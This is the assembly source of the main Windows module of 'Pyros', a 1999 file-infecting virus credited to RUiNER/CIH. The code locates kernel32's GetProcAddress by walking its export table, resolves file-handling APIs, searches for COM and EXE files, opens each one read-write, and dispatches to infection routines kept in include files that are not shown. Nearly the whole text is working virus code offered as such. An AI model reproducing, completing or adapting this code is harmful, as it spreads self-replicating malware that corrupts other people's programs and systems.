;///////////////////////
;//       PYROS       //
;//  Constructed by   //
;//    RUiNER /CIH    //
;///////////////////////
;//    15th Feb 99    //
;//        To         //
;//   02th April 99   //
;///////////////////////
;// Pyros Main Module //
;//   ---= WIN =---   //
;///////////////////////

        .386p
        .Radix 16
        .model flat
        .code

KERN32  equ     0BFF70000h

Win32Mod:
        mov     ebp,eax
        sub     ebp,offset Win32Mod

        lea     esi,[ebp+offset HostAddress]
        lea     edi,[ebp+offset HostAddressA]
        movsd

        INCLUDE         RUiNER.INC

        mov     edi,KERN32
        cmp     word ptr [edi],'ZM'             ;MZ
        jne     RestoreHost                     ;Not Win95
        add     edi,dword ptr [edi+3Ch]
        cmp     dword ptr [edi],4550h           ;PE/0/0
        jne     RestoreHost                     ;Not Win95
        mov     edi,[edi+78h]                   ;EDI = Export RVA of Kern32
        add     edi,KERN32                      ;EDI = Export Address (VA)
        mov     esi,[edi+20h]                   ;ESI = Name Ptr Table
        add     esi,KERN32
        mov     ecx,[edi+24h]                   ;ECX = Ordinal Table
        add     ecx,KERN32
        mov     dword ptr [ebp+offset OrdTbl],ecx
        mov     ecx,[edi+1Ch]                   ;ECX = Address Table
        add     ecx,KERN32
        mov     dword ptr [ebp+offset AdrTbl],ecx

        mov     ecx,[edi+18h]                   ;ECX = Number of Names
        mov     edx,ecx                         ;EDX = Number of Names

FindGPA:                                        ;'GetProcAddress',0
        lodsd
        add     eax,KERN32                      ;Virt. Address of Name
        cmp     dword ptr [eax],'PteG'
        jne     NotGPA
        cmp     dword ptr [eax+4h],'Acor'
        jne     NotGPA
        cmp     dword ptr [eax+8h],'erdd'
        jne     NotGPA
        cmp     word ptr [eax+0Ch],'ss'
        jne     NotGPA
        cmp     byte ptr [eax+0Eh],0
        je      WorkOutRVA
NotGPA: loop    FindGPA

RestoreHost:
        mov     eax,dword ptr [ebp+HostAddressA]
        push    eax
        ret                                             ;Restore Host

WorkOutRVA:
        sub     edx,ecx                                 ;API Number (Max - Left)
        shl     edx,1                                   ;EDX = Ordinal Index
        add     edx,dword ptr [ebp+offset OrdTbl]       ;EDX = Adr of Ordinal
        xor     eax,eax
        add     ax, word ptr [edx]                      ;AX = Ordinal
        shl     eax,2h
        add     eax,dword ptr [ebp+offset AdrTbl]       ;EAX = Addr of RVA
        mov     edx,[eax]                               ;EDX = RVA of GPA
        add     edx,KERN32                              ;EDX = Virt. Addr of GPA!
        mov     dword ptr [ebp+offset GetProcAddr],edx

        lea     edi,[ebp+offset FindFirstFile]

        lea     eax,[ebp+offset n_FindFirst]
        push    eax
        call    GetNSave

        lea     eax,[ebp+offset n_FindNext]
        push    eax
        call    GetNSave

        lea     eax,[ebp+offset n_lopen]
        push    eax
        call    GetNSave

        lea     eax,[ebp+offset n_lclose]
        push    eax
        call    GetNSave

        lea     eax,[ebp+offset n_lread]
        push    eax
        call    GetNSave

        lea     eax,[ebp+offset n_lwrite]
        push    eax
        call    GetNSave

        lea     eax,[ebp+offset n_llseek]
        push    eax
        call    GetNSave

FindCom:
        lea     eax,[ebp+offset FindDat]
        push    eax
        lea     eax,[ebp+offset ComSpex]
        push    eax
        call    dword ptr [ebp+offset FindFirstFile]

        cmp     eax,INVALID_HANDLE_VALUE
        je      FindExe
        mov     dword ptr [ebp+offset FindHnd],eax
FoundCom:
        call    Infexion
        lea     eax,[ebp+offset FindDat]
        push    eax
        push    dword ptr [ebp+offset FindHnd]
        call    dword ptr [ebp+offset FindNextFile]
        cmp     eax,0h
        jne     FoundCom

FindExe:
        lea     eax,[ebp+offset FindDat]
        push    eax
        lea     eax,[ebp+offset ExeSpex]
        push    eax
        call    dword ptr [ebp+offset FindFirstFile]

        cmp     eax,INVALID_HANDLE_VALUE
        je      RestoreHost
        mov     dword ptr [ebp+offset FindHnd],eax
FoundExe:
        call    Infexion
        lea     eax,[ebp+offset FindDat]
        push    eax
        push    dword ptr [ebp+offset FindHnd]
        call    dword ptr [ebp+offset FindNextFile]
        cmp     eax,0
        jne     FoundExe
        jmp     RestoreHost

Infexion:
        push    OF_READWRITE
        lea     eax,[ebp+offset FindDat.WFD_szFileName]
        push    eax
        call    dword ptr [ebp+offset lopen]            ;Open File

        cmp     eax,INVALID_HANDLE_VALUE
        je      Feck
        mov     dword ptr [ebp+offset FileHnd],eax

        push    40h
        lea     eax,[ebp+offset heder]
        push    eax
        push    dword ptr [ebp+offset FileHnd]
        call    dword ptr [ebp+offset lread]

        cmp     word ptr [ebp+offset heder],'ZM'
        je      ItsEXE

        cmp     word ptr [ebp+offset heder],'MZ'
        je      ItsEXE

        INCLUDE         P_W32COM.INC

FeckO:  push    dword ptr [ebp+offset FileHnd]
        call    dword ptr [ebp+offset lclose]

Feck:   ret

ItsEXE: xor     ax,ax
        add     ax,word ptr [ebp+offset heder+18h]
        cmp     ax,40h
        je      Win32Infection

        INCLUDE         P_W32EXE.INC

        jmp     FeckO

Win32Infection:

        INCLUDE         P_W32W32.INC

        jmp     FeckO

GetNSave:
        pop     ebx
        push    KERN32
        call    dword ptr [ebp+offset GetProcAddr]
        stosd
        push    ebx
        ret


        INCLUDE         P_WAPI.INC


HostAddressA            dd              0h

FileHnd                 dd              0h

FindHnd                 dd              0h
FindDat                 WIN32_FIND_DATA ?
heder                   equ             offset VirusOff + 4h

        INCLUDE         P_PE.INC


vir_len         equ     offset Our_Current_API - VirusStart
;vir_len         equ     offset HostAddressA - VirusStart
dos_len         equ     039Bh
buf_len         equ     0AF7h
VirusStart      equ     offset Win32Mod - dos_len

JmpExe          equ     VirusStart + 058h
StackExe        equ     VirusStart + 05Ch
ComSpex         equ     VirusStart + 0BCh
ExeSpex         equ     VirusStart + 0C2h
HostType        equ     VirusStart + 0CAh
OrigCom         equ     VirusStart + 0CBh
NewJmpCom       equ     VirusStart + 0D1h
HostAddress     equ     VirusStart + 0D7h

        end     Win32Mod
